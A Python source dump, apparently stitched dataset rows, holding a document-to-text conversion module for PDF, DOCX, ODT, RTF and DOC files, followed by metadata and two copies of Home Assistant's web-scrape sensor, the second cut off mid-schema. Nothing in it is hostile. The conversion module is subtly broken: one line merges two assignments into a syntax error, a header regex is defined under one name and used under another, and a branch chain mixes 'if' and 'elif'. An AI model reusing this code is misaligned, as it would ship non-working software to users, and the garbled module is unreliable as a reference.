import pdfminer.pdfpage
except ImportError:
pdfminer = None
try:
# noinspection PyPackageRequirements
import pyth # pip install pyth (PYTHON 2 ONLY; https://pypi.python.org/pypi/pyth/0.5.4) # noqa
# noinspection PyPackageRequirements
import pyth.plugins.rtf15.reader
# noinspection PyPackageRequirements
import pyth.plugins.plaintext.writer
except ImportError:
pyth = None
log = get_brace_style_log_with_null_handler(__name__)
# =============================================================================
# Constants
# =============================================================================
AVAILABILITY = 'availability'
CONVERTER = 'converter'
DEFAULT_WIDTH = 120
DEFAULT_MIN_COL_WIDTH = 15
SYS_ENCODING = sys.getdefaultencoding()
ENCODING = "utf-8"
# =============================================================================
# External tool map
# =============================================================================
tools = {
'antiword': shutil.which('antiword'), # sudo apt-get install antiword
'pdftotext': shutil.which('pdftotext'), # core part of Linux?
'strings': shutil.which('strings'), # part of standard Unix
'strings2': shutil.which('strings2'),
# ... Windows: https://technet.microsoft.com/en-us/sysinternals/strings.aspx # noqa
# ... Windows: http://split-code.com/strings2.html
'unrtf': shutil.which('unrtf'), # sudo apt-get install unrtf
}
def does_unrtf_support_quiet() -> bool:
required_unrtf_version = Version("0.21.9")
# ... probably: http://hg.savannah.gnu.org/hgweb/unrtf/
# ... 0.21.9 definitely supports --quiet
# ... 0.19.3 definitely doesn't support it
unrtf_filename = shutil.which('unrtf')
if not unrtf_filename:
return False
p = subprocess.Popen(["unrtf", "--version"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, err_bytes = p.communicate()
text = err_bytes.decode(sys.getdefaultencoding())
lines = text.split()
if len(lines) < 1:
return False
version_str = lines[0]
unrtf_version = Version(version_str)
return unrtf_version >= required_unrtf_version
UNRTF_SUPPORTS_QUIET = does_unrtf_support_quiet()
def update_external_tools(tooldict: Dict[str, str]) -> None:
global tools
tools.update(tooldict)
class TextProcessingConfig(object):
def __init__(self,
encoding: str = None,
width: int = DEFAULT_WIDTH,
min_col_width: int = DEFAULT_MIN_COL_WIDTH,
plain: bool = False,
semiplain: bool = False,
docx_in_order: bool = True,
horizontal_char="─",
vertical_char="│",
junction_char="┼",
plain_table_start: str = None,
plain_table_end: str = None,
plain_table_col_boundary: str = None,
plain_table_row_boundary: str = None,
rstrip: bool = True) -> None:
if plain and semiplain:
log.warning("You specified both plain and semiplain; using plain")
semiplain = False
middlewidth = width - 2 if width > 2 else 77
if plain_table_start is None:
plain_table_start = "╔" + ("═" * middlewidth) + "╗"
if plain_table_end is None:
plain_table_end = "╚" + ("═" * middlewidth) + "╝"
if plain_table_row_boundary is None:
plain_table_row_boundary = "═" * (middlewidth + 2)
if plain_table_col_boundary is None:
plain_table_col_boundary = "─" * (middlewidth + 2)
self.encoding = encoding
self.width = width
self.min_col_width = min_col_width
self.plain = plain
self.semiplain = semiplain
self.docx_in_order = docx_in_order
self.horizontal_char = horizontal_char
self.vertical_char = vertical_char
self.junction_char = junction_char
self.plain_table_start = plain_table_start
self.plain_table_end = plain_table_end
self.plain_table_col_boundary = plain_table_col_boundary
self.plain_table_row_boundary = plain_table_row_boundary
self.rstrip = rstrip
_DEFAULT_CONFIG = TextProcessingConfig()
def get_filelikeobject(filename: str = None,
blob: bytes = None) -> BinaryIO:
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if filename:
return open(filename, 'rb')
else:
return io.BytesIO(blob)
def get_file_contents(filename: str = None, blob: bytes = None) -> bytes:
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if blob:
return blob
with open(filename, 'rb') as f:
return f.read()
def get_chardet_encoding(binary_contents: bytes) -> Optional[str]:
if not binary_contents:
return None
if chardet is None or UniversalDetector is None:
log.warning("chardet not installed; limits detection of encodings")
return None
detector = UniversalDetector()
for byte_line in binary_contents.split(b"\n"):
detector.feed(byte_line)
if detector.done:
break
guess = detector.result
if 'encoding' not in guess:
log.warning("Something went wrong within chardet; no encoding")
return None
return guess['encoding']
def get_file_contents_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
binary_contents = get_file_contents(filename=filename, blob=blob)
if config.encoding:
try:
return binary_contents.decode(config.encoding)
except ValueError:
pass
sysdef = sys.getdefaultencoding()
if sysdef != config.encoding:
try:
return binary_contents.decode(sysdef)
except ValueError:
pass
if chardet:
guess = chardet.detect(binary_contents)
if guess['encoding']:
return binary_contents.decode(guess['encoding'])
raise ValueError("Unknown encoding ({})".format(
f"filename={filename!r}" if filename else "blob"))
def get_cmd_output(*args, encoding: str = SYS_ENCODING) -> str:
log.debug("get_cmd_output(): args = {!r}", args)
p = subprocess.Popen(args, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
return stdout.decode(encoding, errors='ignore')
def get_cmd_output_from_stdin(stdint_content_binary: bytes,
*args, encoding: str = SYS_ENCODING) -> str:
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
stdout, stderr = p.communicate(input=stdint_content_binary)
return stdout.decode(encoding, errors='ignore')
def rstrip_all_lines(text: str) -> str:
return "\n".join(
line.rstrip()
for line in text.splitlines()
)
def convert_pdf_to_txt(filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
pdftotext = tools['pdftotext']
if pdftotext:
if filename:
return get_cmd_output(pdftotext, filename, '-')
else:
return get_cmd_output_from_stdin(blob, pdftotext, '-', '-')
elif pdfminer:
with get_filelikeobject(filename, blob) as fp:
rsrcmgr = pdfminer.pdfinterp.PDFResourceManager()
retstr = StringIO()
codec = ENCODING
laparams = pdfminer.layout.LAParams()
device = pdfminer.converter.TextConverter(
rsrcmgr, retstr, codec=codec, laparams=laparams)
interpreter = pdfminer.pdfinterp.PDFPageInterpreter(rsrcmgr,
device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in pdfminer.pdfpage.PDFPage.get_pages(
fp, pagenos, maxpages=maxpages, password=password,
caching=caching, check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue().decode(ENCODING)
return text
else:
raise AssertionError("No PDF-reading tool available")
def availability_pdf() -> bool:
pdftotext = tools['pdftotext']
if pdftotext:
return True
elif pdfminer:
log.warning("PDF conversion: pdftotext missing; "
"using pdfminer (less efficient)")
return True
else:
return False
_HEADER_FILE_REGEX = re.compile('word/header[0-9]*.xml')
DOCX_DOC_FILE = 'word/document.xml'
DOCX_FOOTER_FILE_REGEX = re.compile('word/footer[0-9]*.xml')
DOCX_SCHEMA_URL = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
def docx_qn(tagroot):
return f'{{{DOCX_SCHEMA_URL}}}{tagroot}'
DOCX_TEXT = docx_qn('t')
DOCX_TABLE = docx_qn('tbl') TAB = docx_qn('tab')
DOCX_NEWLINES = [docx_qn('br'), docx_qn('cr')]
DOCX_NEWPARA = docx_qn('p')
DOCX_TABLE_ROW = docx_qn('tr')
DOCX_TABLE_CELL = docx_qn('tc')
def gen_xml_files_from_docx(fp: BinaryIO) -> Iterator[str]:
try:
z = zipfile.ZipFile(fp)
filelist = z.namelist()
for filename in filelist:
if DOCX_HEADER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
yield z.read(DOCX_DOC_FILE)
for filename in filelist:
if DOCX_FOOTER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
except zipfile.BadZipFile:
raise zipfile.BadZipFile("File is not a zip file - encrypted DOCX?")
class DocxFragment(object):
def __init__(self, text: str, wordwrap: bool = True) -> None:
self.text = text
self.wordwrap = wordwrap
def docx_gen_wordwrapped_fragments(fragments: Iterable[DocxFragment],
width: int) -> Generator[str, None, None]:
to_wrap = []
def yield_wrapped():
nonlocal to_wrap
if to_wrap:
block = "".join(x.text for x in to_wrap)
wrapped = "\n".join(
wordwrap(line, width)
for line in block.splitlines()
)
yield wrapped
to_wrap.clear()
for f in fragments:
if f.wordwrap:
to_wrap.append(f)
else:
yield from yield_wrapped()
yield f.text
yield from yield_wrapped()
def docx_wordwrap_fragments(fragments: Iterable[DocxFragment],
width: int) -> str:
return "".join(docx_gen_wordwrapped_fragments(fragments, width))
def docx_gen_fragments_from_xml_node(
node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> Generator[DocxFragment, None, None]:
tag = node.tag
log.debug("Level {}, tag {}", level, tag)
if tag == DOCX_TEXT:
log.debug("Text: {!r}", node.text)
yield DocxFragment(node.text or "")
elif tag == DOCX_TAB:
log.debug("Tab")
yield DocxFragment("\t")
elif tag in DOCX_NEWLINES:
log.debug("Newline")
yield DocxFragment("\n")
elif tag == DOCX_NEWPARA:
log.debug("New paragraph")
yield DocxFragment("\n\n")
if tag == DOCX_TABLE:
log.debug("Table")
yield DocxFragment("\n", wordwrap=False)
yield DocxFragment(docx_table_from_xml_node(node, level, config),
wordwrap=False)
else:
for child in node:
for fragment in docx_gen_fragments_from_xml_node(
child, level + 1, config):
yield fragment
def docx_text_from_xml_node(node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
return docx_wordwrap_fragments(
docx_gen_fragments_from_xml_node(node, level, config),
config.width)
def docx_text_from_xml(xml: str, config: TextProcessingConfig) -> str:
root = ElementTree.fromstring(xml)
return docx_text_from_xml_node(root, 0, config)
class CustomDocxParagraph(object):
def __init__(self, text: str = '') -> None:
self.text = text or ''
def __repr__(self) -> str:
return f"CustomDocxParagraph(text={self.text!r})"
class CustomDocxTableCell(object):
def __init__(self, paragraphs: List[CustomDocxParagraph] = None) -> None:
self.paragraphs = paragraphs or []
def add_paragraph(self, text: str) -> None:
self.paragraphs.append(CustomDocxParagraph(text))
def __repr__(self) -> str:
return f"CustomDocxTableCell(paragraphs={self.paragraphs!r})"
class CustomDocxTableRow(object):
def __init__(self, cells: List[CustomDocxTableCell] = None) -> None:
self.cells = cells or []
def add_cell(self, cell: CustomDocxTableCell) -> None:
self.cells.append(cell)
def new_cell(self) -> None:
self.cells.append(CustomDocxTableCell())
def add_paragraph(self, text: str) -> None:
self.cells[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTableRow(cells={self.cells!r})"
class CustomDocxTable(object):
def __init__(self, rows: List[CustomDocxTableRow] = None) -> None:
self.rows = rows or []
def add_row(self, row: CustomDocxTableRow) -> None:
self.rows.append(row)
def new_row(self) -> None:
self.rows.append(CustomDocxTableRow())
def new_cell(self) -> None:
self.rows[-1].new_cell()
def add_paragraph(self, text: str) -> None:
self.rows[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTable(rows={self.rows!r})"
def docx_table_from_xml_node(table_node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
table = CustomDocxTable()
for row_node in table_node:
if row_node.tag != DOCX_TABLE_ROW:
continue
table.new_row()
for cell_node in row_node:
if cell_node.tag != DOCX_TABLE_CELL:
continue
table.new_cell()
for para_node in cell_node:
text = docx_text_from_xml_node(para_node, level, config)
if text:
table.add_paragraph(text)
return docx_process_table(table, config)
def wordwrap(text: str, width: int) -> str:
if not text:
return ''
if width:
return '\n'.join(textwrap.wrap(text, width=width))
return text
def docx_process_table(table: DOCX_TABLE_TYPE,
config: TextProcessingConfig) -> str:
def get_cell_text(cell_) -> str:
cellparagraphs = [paragraph.text.strip()
for paragraph in cell_.paragraphs]
cellparagraphs = [x for x in cellparagraphs if x]
return '\n\n'.join(cellparagraphs)
if config.plain:
lines = [config.plain_table_start]
for r, row in enumerate(table.rows):
if r > 0:
lines.append(config.plain_table_row_boundary)
for c, cell in enumerate(row.cells):
if c > 0:
lines.append(config.plain_table_col_boundary)
lines.append(get_cell_text(cell))
lines.append(config.plain_table_end)
return "\n".join(lines)
else:
ncols = 1
for row in table.rows:
ncols = max(ncols, len(row.cells))
pt = prettytable.PrettyTable(
field_names=list(range(ncols)),
encoding=ENCODING,
header=False,
border=True,
hrules=prettytable.ALL,
vrules=prettytable.NONE if config.semiplain else prettytable.ALL,
horizontal_char=config.horizontal_char,
vertical_char=config.vertical_char,
junction_char=config.junction_char,
)
pt.align = 'l'
pt.valign = 't'
pt.max_width = max(config.width // ncols, config.min_col_width)
if config.semiplain:
for row in table.rows:
for i, cell in enumerate(row.cells):
n_before = i
n_after = ncols - i - 1
ptrow = (
[''] * n_before +
[get_cell_text(cell)] +
[''] * n_after
)
assert(len(ptrow) == ncols)
pt.add_row(ptrow)
else:
for row in table.rows:
ptrow = []
for cell in row.cells:
ptrow.append(get_cell_text(cell))
ptrow += [''] * (ncols - len(ptrow))
assert (len(ptrow) == ncols)
pt.add_row(ptrow)
return pt.get_string()
_ = '''
# noinspection PyProtectedMember,PyUnresolvedReferences
def docx_docx_iter_block_items(parent: DOCX_CONTAINER_TYPE) \
-> Iterator[DOCX_BLOCK_ITEM_TYPE]:
"""
Iterate through items of a DOCX file.
See https://github.com/python-openxml/python-docx/issues/40.
Yield each paragraph and table child within ``parent``, in document order.
Each returned value is an instance of either :class:`Table` or
:class:`Paragraph`. ``parent`` would most commonly be a reference to a main
:class:`Document` object, but also works for a :class:`_Cell` object, which
itself can contain paragraphs and tables.
NOTE: uses internals of the ``python-docx`` (``docx``) library; subject to
change; this version works with ``docx==0.8.5``.
"""
if isinstance(parent, docx.document.Document):
parent_elm = parent.element.body
elif isinstance(parent, docx.table._Cell):
parent_elm = parent._tc
else:
raise ValueError("something's not right")
for child in parent_elm.iterchildren():
if isinstance(child, docx.oxml.text.paragraph.CT_P):
yield docx.text.paragraph.Paragraph(child, parent)
elif isinstance(child, docx.oxml.table.CT_Tbl):
yield docx.table.Table(child, parent)
# noinspection PyUnresolvedReferences
def docx_docx_gen_text(doc: DOCX_DOCUMENT_TYPE,
config: TextProcessingConfig) -> Iterator[str]:
"""
Iterate through a DOCX file and yield text.
Args:
doc: DOCX document to process
config: :class:`TextProcessingConfig` control object
Yields:
pieces of text (paragraphs)
"""
if in_order:
for thing in docx_docx_iter_block_items(doc):
if isinstance(thing, docx.text.paragraph.Paragraph):
yield docx_process_simple_text(thing.text, config.width)
elif isinstance(thing, docx.table.Table):
yield docx_process_table(thing, config)
else:
for paragraph in doc.paragraphs:
yield docx_process_simple_text(paragraph.text, config.width)
for table in doc.tables:
yield docx_process_table(table, config)
'''
# noinspection PyUnusedLocal
def convert_docx_to_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
text = ''
with get_filelikeobject(filename, blob) as fp:
for xml in gen_xml_files_from_docx(fp):
text += docx_text_from_xml(xml, config)
return text
# elif docx:
# with get_filelikeobject(filename, blob) as fp:
# # noinspection PyUnresolvedReferences
# document = docx.Document(fp)
# return '\n\n'.join(
# docx_docx_gen_text(document, config))
# elif docx2txt:
# if filename:
# return docx2txt.process(filename)
# else:
# raise NotImplementedError("docx2txt BLOB handling not written")
# else:
# raise AssertionError("No DOCX-reading tool available")
# =============================================================================
# ODT
# =============================================================================
# noinspection PyUnusedLocal
def convert_odt_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
# We can't use exactly the same method as for DOCX files, using docx:
with get_filelikeobject(filename, blob) as fp:
z = zipfile.ZipFile(fp)
tree = ElementTree.fromstring(z.read('content.xml'))
textlist = []
for element in tree.iter():
if element.text:
textlist.append(element.text.strip())
return '\n\n'.join(textlist)
def convert_html_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulSoup(fp)
return soup.get_text()
def convert_xml_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulStoneSoup(fp)
return soup.get_text()
def convert_rtf_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
unrtf = tools['unrtf']
if unrtf:
args = [unrtf, '--text', '--nopict']
if UNRTF_SUPPORTS_QUIET:
args.append('--quiet')
if filename:
args.append(filename)
return get_cmd_output(*args)
else:
return get_cmd_output_from_stdin(blob, *args)
elif pyth:
with get_filelikeobject(filename, blob) as fp:
doc = pyth.plugins.rtf15.reader.Rtf15Reader.read(fp)
return (
pyth.plugins.plaintext.writer.PlaintextWriter.write(doc).getvalue()
)
else:
raise AssertionError("No RTF-reading tool available")
def availability_rtf() -> bool:
unrtf = tools['unrtf']
if unrtf:
return True
elif pyth:
log.warning("RTF conversion: unrtf missing; "
"using pyth (less efficient)")
return True
else:
return False
def convert_doc_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
antiword = tools['antiword']
if antiword:
if filename:
return get_cmd_output(antiword, '-w', str(config.width), filename)
else:
return get_cmd_output_from_stdin(blob, antiword, '-w',
str(config.width), '-')
else:
raise AssertionError("No DOC-reading tool available")
def availability_doc() -> bool:
antiword = tools['antiword']
return bool(antiword)
def convert_anything_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
strings = tools['strings'] or tools['strings2']
if strings:
if filename:
return get_cmd_output(strings, filename)
else:
return get_cmd_output_from_stdin(blob, strings)
else:
raise AssertionError("No fallback string-reading tool available")
def availability_anything() -> bool:
strings = tools['strings'] or tools['strings2']
return bool(strings)
ext_map = {
'.csv': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.doc': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.docm': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.docx': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.dot': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.htm': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.html': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.log': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.odt': {
CONVERTER: convert_odt_to_text,
AVAILABILITY: True,
},
'.pdf': {
CONVERTER: convert_pdf_to_txt,
AVAILABILITY: availability_pdf,
},
'.rtf': {
CONVERTER: convert_rtf_to_text,
AVAILABILITY: availability_rtf,
},
'.txt': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.xml': {
CONVERTER: convert_xml_to_text,
AVAILABILITY: True,
},
None: {
CONVERTER: convert_anything_to_text,
AVAILABILITY: availability_anything,
},
}
def document_to_text(filename: str = None,
blob: bytes = None,
extension: str = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
if not filename and not blob:
raise ValueError("document_to_text: no filename and no blob")
if filename and blob:
raise ValueError("document_to_text: specify either filename or blob")
if blob and not extension:
raise ValueError("document_to_text: need extension hint for blob")
if filename:
stub, extension = os.path.splitext(filename)
else:
if extension[0] != ".":
extension = "." + extension
extension = extension.lower()
log.debug(
f"filename: {filename}, blob type: {type(blob)}, "
f"blob length: {len(blob) if blob is not None else None}, "
f"extension: {extension}")
if filename and not os.path.isfile(filename):
raise ValueError(f"document_to_text: no such file: {filename!r}")
info = ext_map.get(extension)
if info is None:
log.warning("Unknown filetype: {}; using generic tool", extension)
info = ext_map[None]
func = info[CONVERTER]
text = func(filename, blob, config)
if config.rstrip:
text = rstrip_all_lines(text)
return text
def is_text_extractor_available(extension: str) -> bool:
if extension is not None:
extension = extension.lower()
info = ext_map.get(extension)
if info is None:
return False
availability = info[AVAILABILITY]
if type(availability) == bool:
return availability
elif callable(availability):
return availability()
else:
raise ValueError(
f"Bad information object for extension: {extension}")
def require_text_extractor(extension: str) -> None:
if not is_text_extractor_available(extension):
raise ValueError(
f"No text extractor available for extension: {extension}")
def main() -> None:
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("inputfile", nargs="?", help="Input file name")
parser.add_argument(
"--availability", nargs='*',
help="File extensions to check availability for (use a '.' prefix, "
"and use the special extension 'None' to check the fallback "
"processor")
parser.add_argument(
'--plain', action='store_true',
help="Use plainest format (re e.g. table layouts)")
parser.add_argument(
'--semiplain', action='store_true',
help="Use semi-plain format (re e.g. table layouts)")
parser.add_argument(
"--width", type=int, default=DEFAULT_WIDTH,
help=f"Word wrapping width")
parser.add_argument(
"--min-col-width", type=int, default=DEFAULT_MIN_COL_WIDTH,
help=f"Minimum column width for tables")
args = parser.parse_args()
if args.availability:
for ext in args.availability:
if ext.lower() == 'none':
ext = None
available = is_text_extractor_available(ext)
print(f"Extractor for extension {ext} present: {available}")
return
if not args.inputfile:
parser.print_help(sys.stderr)
return
config = TextProcessingConfig(
width=args.width,
min_col_width=args.min_col_width,
plain=args.plain,
semiplain=args.semiplain,
)
result = document_to_text(filename=args.inputfile, config=config)
if result is None:
return
else:
print(result)
if __name__ == '__main__':
main()
| true
| true
|
1c447439820c7450726bb3a1955016d4b5b8390e
| 7,579
|
py
|
Python
|
homeassistant/components/scrape/sensor.py
|
mib1185/core
|
b17d4ac65cde9a27ff6032d70b148792e5eba8df
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
homeassistant/components/scrape/sensor.py
|
mib1185/core
|
b17d4ac65cde9a27ff6032d70b148792e5eba8df
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
homeassistant/components/scrape/sensor.py
|
mib1185/core
|
b17d4ac65cde9a27ff6032d70b148792e5eba8df
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""Support for getting data from websites with scraping."""
from __future__ import annotations
import logging
from typing import Any
from bs4 import BeautifulSoup
import voluptuous as vol
from homeassistant.components.rest.data import RestData
from homeassistant.components.sensor import (
CONF_STATE_CLASS,
DEVICE_CLASSES_SCHEMA,
PLATFORM_SCHEMA as PARENT_PLATFORM_SCHEMA,
STATE_CLASSES_SCHEMA,
SensorEntity,
)
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_ATTRIBUTE,
CONF_AUTHENTICATION,
CONF_DEVICE_CLASS,
CONF_HEADERS,
CONF_NAME,
CONF_PASSWORD,
CONF_RESOURCE,
CONF_UNIT_OF_MEASUREMENT,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
CONF_VERIFY_SSL,
HTTP_BASIC_AUTHENTICATION,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.template import Template
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from .const import CONF_INDEX, CONF_SELECT, DEFAULT_NAME, DEFAULT_VERIFY_SSL, DOMAIN
_LOGGER = logging.getLogger(__name__)
ICON = "mdi:web"
PLATFORM_SCHEMA = PARENT_PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_RESOURCE): cv.string,
vol.Required(CONF_SELECT): cv.string,
vol.Optional(CONF_ATTRIBUTE): cv.string,
vol.Optional(CONF_INDEX, default=0): cv.positive_int,
vol.Optional(CONF_AUTHENTICATION): vol.In(
[HTTP_BASIC_AUTHENTICATION, HTTP_DIGEST_AUTHENTICATION]
),
vol.Optional(CONF_HEADERS): vol.Schema({cv.string: cv.string}),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_STATE_CLASS): STATE_CLASSES_SCHEMA,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.string,
vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
}
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Web scrape sensor."""
_LOGGER.warning(
# Config flow added in Home Assistant Core 2022.7, remove import flow in 2022.9
"Loading Scrape via platform setup has been deprecated in Home Assistant 2022.7 "
"Your configuration has been automatically imported and you can "
"remove it from your configuration.yaml"
)
if config.get(CONF_VALUE_TEMPLATE):
template: Template = Template(config[CONF_VALUE_TEMPLATE])
template.ensure_valid()
config[CONF_VALUE_TEMPLATE] = template.template
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config,
)
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the Scrape sensor entry."""
name: str = entry.options[CONF_NAME]
resource: str = entry.options[CONF_RESOURCE]
select: str | None = entry.options.get(CONF_SELECT)
attr: str | None = entry.options.get(CONF_ATTRIBUTE)
index: int = int(entry.options[CONF_INDEX])
unit: str | None = entry.options.get(CONF_UNIT_OF_MEASUREMENT)
device_class: str | None = entry.options.get(CONF_DEVICE_CLASS)
state_class: str | None = entry.options.get(CONF_STATE_CLASS)
value_template: str | None = entry.options.get(CONF_VALUE_TEMPLATE)
entry_id: str = entry.entry_id
val_template: Template | None = None
if value_template is not None:
val_template = Template(value_template, hass)
rest = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
[
ScrapeSensor(
rest,
name,
select,
attr,
index,
val_template,
unit,
device_class,
state_class,
entry_id,
resource,
)
],
True,
)
class ScrapeSensor(SensorEntity):
"""Representation of a web scrape sensor."""
_attr_icon = ICON
def __init__(
self,
rest: RestData,
name: str,
select: str | None,
attr: str | None,
index: int,
value_template: Template | None,
unit: str | None,
device_class: str | None,
state_class: str | None,
entry_id: str,
resource: str,
) -> None:
"""Initialize a web scrape sensor."""
self.rest = rest
self._attr_native_value = None
self._select = select
self._attr = attr
self._index = index
self._value_template = value_template
self._attr_name = name
self._attr_native_unit_of_measurement = unit
self._attr_device_class = device_class
self._attr_state_class = state_class
self._attr_unique_id = entry_id
self._attr_device_info = DeviceInfo(
entry_type=DeviceEntryType.SERVICE,
identifiers={(DOMAIN, entry_id)},
manufacturer="Scrape",
name=name,
configuration_url=resource,
)
def _extract_value(self) -> Any:
"""Parse the html extraction in the executor."""
raw_data = BeautifulSoup(self.rest.data, "lxml")
_LOGGER.debug(raw_data)
try:
if self._attr is not None:
value = raw_data.select(self._select)[self._index][self._attr]
else:
tag = raw_data.select(self._select)[self._index]
if tag.name in ("style", "script", "template"):
value = tag.string
else:
value = tag.text
except IndexError:
_LOGGER.warning("Index '%s' not found in %s", self._attr, self.entity_id)
value = None
except KeyError:
_LOGGER.warning(
"Attribute '%s' not found in %s", self._attr, self.entity_id
)
value = None
_LOGGER.debug(value)
return value
async def async_update(self) -> None:
"""Get the latest data from the source and updates the state."""
await self.rest.async_update()
await self._async_update_from_rest_data()
async def async_added_to_hass(self) -> None:
"""Ensure the data from the initial update is reflected in the state."""
await self._async_update_from_rest_data()
async def _async_update_from_rest_data(self) -> None:
"""Update state from the rest data."""
if self.rest.data is None:
_LOGGER.error("Unable to retrieve data for %s", self.name)
return
value = await self.hass.async_add_executor_job(self._extract_value)
if self._value_template is not None:
self._attr_native_value = (
self._value_template.async_render_with_possible_json_value(value, None)
)
else:
self._attr_native_value = value
| 33.535398
| 89
| 0.65312
|
from __future__ import annotations
import logging
from typing import Any
from bs4 import BeautifulSoup
import voluptuous as vol
from homeassistant.components.rest.data import RestData
from homeassistant.components.sensor import (
CONF_STATE_CLASS,
DEVICE_CLASSES_SCHEMA,
PLATFORM_SCHEMA as PARENT_PLATFORM_SCHEMA,
STATE_CLASSES_SCHEMA,
SensorEntity,
)
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_ATTRIBUTE,
CONF_AUTHENTICATION,
CONF_DEVICE_CLASS,
CONF_HEADERS,
CONF_NAME,
CONF_PASSWORD,
CONF_RESOURCE,
CONF_UNIT_OF_MEASUREMENT,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
CONF_VERIFY_SSL,
HTTP_BASIC_AUTHENTICATION,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.template import Template
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from .const import CONF_INDEX, CONF_SELECT, DEFAULT_NAME, DEFAULT_VERIFY_SSL, DOMAIN
_LOGGER = logging.getLogger(__name__)
ICON = "mdi:web"
PLATFORM_SCHEMA = PARENT_PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_RESOURCE): cv.string,
vol.Required(CONF_SELECT): cv.string,
vol.Optional(CONF_ATTRIBUTE): cv.string,
vol.Optional(CONF_INDEX, default=0): cv.positive_int,
vol.Optional(CONF_AUTHENTICATION): vol.In(
[HTTP_BASIC_AUTHENTICATION, HTTP_DIGEST_AUTHENTICATION]
),
vol.Optional(CONF_HEADERS): vol.Schema({cv.string: cv.string}),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_STATE_CLASS): STATE_CLASSES_SCHEMA,
